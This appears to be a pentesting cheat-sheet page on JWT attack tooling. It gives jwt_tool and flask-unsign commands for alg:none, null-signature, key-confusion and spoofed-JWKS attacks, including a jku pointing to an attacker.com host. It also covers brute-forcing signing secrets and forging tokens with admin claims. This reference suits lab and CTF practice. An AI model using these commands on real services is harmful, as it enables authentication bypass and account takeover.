๐Ÿ“– CyberBook

Appearance

JWT Attacks Tools โ€‹

๐Ÿ“š Resources โ€‹

๐Ÿ› ๏ธ JWT_Tool โ€‹

bash
# interractive mode to edit values
jwt_tool $(cat jwt) -T

# change header value
jwt_tool $(cat jwt) -I -hc <key> -hv <new_value>

# change payload value
jwt_tool $(cat jwt) -I -pc <key> -pv <new_value>

# After put new jwt in a new file
jwt_tool $(cat new_jwt) -X k -pk /key/file # you can used -I option here

# Brute force
jwt_tool $(cat jwt) -C -d /path/to/dictionnary
bash
# -X option can be used to exploit specific attacks
a = alg:none
n = null signature
b = <blank> password accepted in signature
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk) # used public key to sign jwt
i = inject inline JWKS # Key Injection in header (CVE-2018-0114)
bash
# Invalid Signature

jwt_tool jwt -X k -pk /dev/null # sign with null
jwt_tool jwt -X n # remove signature
jwt_tool jwt -X a # remove signature and give 4 JWT => none, None, NONE, nOnE

JWK - jku โ€‹

bash
# Paste the key from PATH into a file you create for storing the key
tail -n +3 ~/.jwt_tool/jwttool_custom_jwks.json | head -n -2 > jwk.json  # Extract the first key from jwttool_custom_jwks.json and save it as jwk.json to host on your server

# Sign the JWT using jwttool's default key file
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin
bash
# Or sign the JWT using your own custom key file
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin -jw my_custom_jwk.json
bash
# Or sign the JWT using the private_key.pem instead of the JWKS
jwt_tool $(cat jwt) -X s -ju http://attacker.com/jwks.json -I -pc user -pv admin -pr ctf_jwt/private_key.pem

Flask-unsign โ€‹

bash
# install
pip install flask-unsign
bash
# Decode a JWT:
flask-unsign --decode --cookie "your_jwt_token"
# or
flask-unsign --decode --cookie < cookie.txt
bash
# Brute-force signature key
flask-unsign --wordlist /path/to/wordlist --unsign --cookie "your_jwt_token" --no-literal-eval
bash
# Create a Modified JWT with a Known Key:
flask-unsign --sign --cookie "{'admin': 'true','username': 'admin'}" --secret 'your_secret_key'